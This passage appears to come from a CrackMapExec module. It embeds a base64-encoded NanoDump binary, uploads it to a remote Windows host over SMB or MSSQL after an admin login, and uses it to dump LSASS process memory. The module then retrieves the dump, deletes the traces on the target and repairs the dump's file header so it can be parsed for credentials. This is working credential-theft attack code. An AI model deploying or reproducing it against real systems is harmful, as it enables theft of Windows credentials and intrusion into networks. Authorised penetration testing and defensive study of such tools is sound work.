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wAADZAkdldFN0YXJ0dXBJbmZvQQBQA0hlYXBBbGxvYwBWA0hlYXBGcmVlAABtA0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AjQNJc0RCQ1NMZWFkQnl0ZUV4AADNA0xlYXZlQ3JpdGljYWxTZWN0aW9uAADRA0xvYWRMaWJyYXJ5QQAAAARNdWx0aUJ5dGVUb1dpZGVDaGFyAFoFU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAGoFU2xlZXAAjQVUbHNHZXRWYWx1ZQC9BVZpcnR1YWxQcm90ZWN0AADABVZpcnR1YWxRdWVyeQAA8gVXaWRlQ2hhclRvTXVsdGlCeXRlADoAX19nZXRtYWluYXJncwA7AF9faW5pdGVudgBFAF9fbWJfY3VyX21heAAATABfX3BfX2FjbWRsbgBOAF9fcF9fY29tbW9kZQAAUwBfX3BfX2Ztb2RlAABoAF9fc2V0X2FwcF90eXBlAABrAF9fc2V0dXNlcm1hdGhlcnIAAI4AX2Ftc2dfZXhpdAAAnwBfY2V4aXQAAEIBX2Vycm5vAABSAV9pbml0dGVybQBWAV9pb2IAALkBX2xvY2sAOgJfb25leGl0AOECX3VubG9jawAfA193Y3NpY21wAACaA2Fib3J0AKMDYXRvaQAApwNjYWxsb2MAALEDZXhpdAAAwgNmcHJpbnRmAMQDZnB1dGMAyQNmcmVlAADWA2Z3cml0ZQAA/wNsb2NhbGVjb252AAADBG1hbGxvYwAABgRtYnN0b3djcwAACgRtZW1jbXAAAAsEbWVtY3B5AAANBG1lbXNldAAAHQRyYW5kAAAmBHNldGxvY2FsZQAoBHNpZ25hbAAALgRzcmFuZAA0BHN0cmNocgAAOgRzdHJlcnJvcgAAPARzdHJsZW4AAD8Ec3RybmNtcABABHN0cm5jcHkAQwRzdHJyY2hyAEQEc3Ryc3BuAABhBHZmcHJpbnRmAADLAnRpbWUAAHsEd2NzbGVuAAB8BHdjc25jYXQAfwR3Y3NuY3B5AIYEd2Nzc3RyAAAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAS0VSTkVMMzIuZGxsAAAAABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABABSAAQAUgAEAFIABAG1zdmNydC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACARQAAAAAAAAAAAABAQQAAAAAAAAAAAAEB/QADwfkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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"
)
self.nano = "nano.exe"
self.nano_path = ""
self.useembeded = True
if "NANO_PATH" in module_options:
self.nano_path = module_options["NANO_PATH"]
self.useembeded = False
else:
if sys.platform == "win32":
appdata_path = os.getenv("APPDATA")
if not os.path.exists(appdata_path + "\CME"):
os.mkdir(appdata_path + "\CME")
self.nano_path = appdata_path + "\CME\\"
else:
if not os.path.exists("/tmp/cme/"):
os.mkdir("/tmp/cme/")
self.nano_path = "/tmp/cme/"
self.dir_result = self.nano_path
if "NANO_EXE_NAME" in module_options:
self.nano = module_options["NANO_EXE_NAME"]
self.useembeded = False
if "TMP_DIR" in module_options:
self.tmp_dir = module_options["TMP_DIR"]
if "DIR_RESULT" in module_options:
self.dir_result = module_options["DIR_RESULT"]
def on_admin_login(self, context, connection):
self.connection = connection
self.context = context
if self.useembeded:
with open(self.nano_path + self.nano, "wb") as nano:
if self.connection.os_arch == 32 and self.context.protocol == "smb":
self.context.log.display("32-bit Windows detected.")
nano.write(self.nano_embedded32)
elif self.connection.os_arch == 64 and self.context.protocol == "smb":
self.context.log.display("64-bit Windows detected.")
nano.write(self.nano_embedded64)
elif self.context.protocol == "mssql":
nano.write(self.nano_embedded64)
else:
self.context.log.fail("Unsupported Windows architecture")
sys.exit(1)
if self.context.protocol == "smb":
with open(self.nano_path + self.nano, "rb") as nano:
try:
self.connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read)
self.context.log.success(f"Created file {self.nano} on the \\\\{self.share}{self.tmp_share}")
except Exception as e:
self.context.log.fail(f"Error writing file to share {self.share}: {e}")
else:
with open(self.nano_path + self.nano, "rb") as nano:
try:
self.context.log.display(f"Copy {self.nano} to {self.tmp_dir}")
exec_method = MSSQLEXEC(self.connection.conn)
exec_method.put_file(nano.read(), self.tmp_dir + self.nano)
if exec_method.file_exists(self.tmp_dir + self.nano):
self.context.log.success(f"Created file {self.nano} on the remote machine {self.tmp_dir}")
else:
self.context.log.fail("File does not exist on the remote system... error during upload")
sys.exit(1)
except Exception as e:
self.context.log.fail(f"Error writing file to remote machine directory {self.tmp_dir}: {e}")
# apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display())
# if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the
# execution fails, which it doesn't
display_output = True if self.context.protocol == "smb" else False
self.context.log.debug(f"Display Output: {display_output}")
# get LSASS PID via `tasklist`
command = 'tasklist /v /fo csv | findstr /i "lsass"'
self.context.log.display(f"Getting LSASS PID via command {command}")
p = self.connection.execute(command, display_output)
self.context.log.debug(f"tasklist Command Result: {p}")
if len(p) == 1:
p = p[0]
if not p or p == "None":
self.context.log.fail(f"Failed to execute command to get LSASS PID")
return
pid = p.split(",")[1][1:-1]
self.context.log.debug(f"pid: {pid}")
timestamp = datetime.today().strftime("%Y%m%d_%H%M")
nano_log_name = f"{timestamp}.log"
command = f"{self.tmp_dir}{self.nano} --pid {pid} --write {self.tmp_dir}{nano_log_name}"
self.context.log.display(f"Executing command {command}")
p = self.connection.execute(command, display_output)
self.context.log.debug(f"NanoDump Command Result: {p}")
if not p or p == "None":
self.context.log.fail(f"Failed to execute command to execute NanoDump")
self.delete_nanodump_binary()
return
# results returned are different between SMB and MSSQL
full_results = " ".join(p) if self.context.protocol == "mssql" else p
if "Done" in full_results:
self.context.log.success("Process lsass.exe was successfully dumped")
dump = True
else:
self.context.log.fail("Process lsass.exe error on dump, try with verbose")
dump = False
if dump:
self.context.log.display(f"Copying {nano_log_name} to host")
filename = f"{self.dir_result}{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log"
if self.context.protocol == "smb":
with open(filename, "wb+") as dump_file:
try:
self.connection.conn.getFile(self.share, self.tmp_share + nano_log_name, dump_file.write)
self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}")
except Exception as e:
self.context.log.fail(f"Error while getting file: {e}")
try:
self.connection.conn.deleteFile(self.share, self.tmp_share + self.nano)
self.context.log.success(f"Deleted nano file on the {self.share} share")
except Exception as e:
self.context.log.fail(f"Error deleting nano file on share {self.share}: {e}")
try:
self.connection.conn.deleteFile(self.share, self.tmp_share + nano_log_name)
self.context.log.success(f"Deleted lsass.dmp file on the {self.share} share")
except Exception as e:
self.context.log.fail(f"Error deleting lsass.dmp file on share {self.share}: {e}")
else:
try:
exec_method = MSSQLEXEC(self.connection.conn)
exec_method.get_file(self.tmp_dir + nano_log_name, filename)
self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}")
except Exception as e:
self.context.log.fail(f"Error while getting file: {e}")
self.delete_nanodump_binary()
try:
self.connection.execute(f"del {self.tmp_dir + nano_log_name}")
self.context.log.success(f"Deleted lsass.dmp file on the {self.tmp_dir} dir")
except Exception as e:
self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}")
fh = open(filename, "r+b")
fh.seek(0)
fh.write(b"\x4d\x44\x4d\x50")
fh.seek(4)
fh.write(b"\xa7\x93")
fh.seek(6)
fh.write(b"\x00\x00")
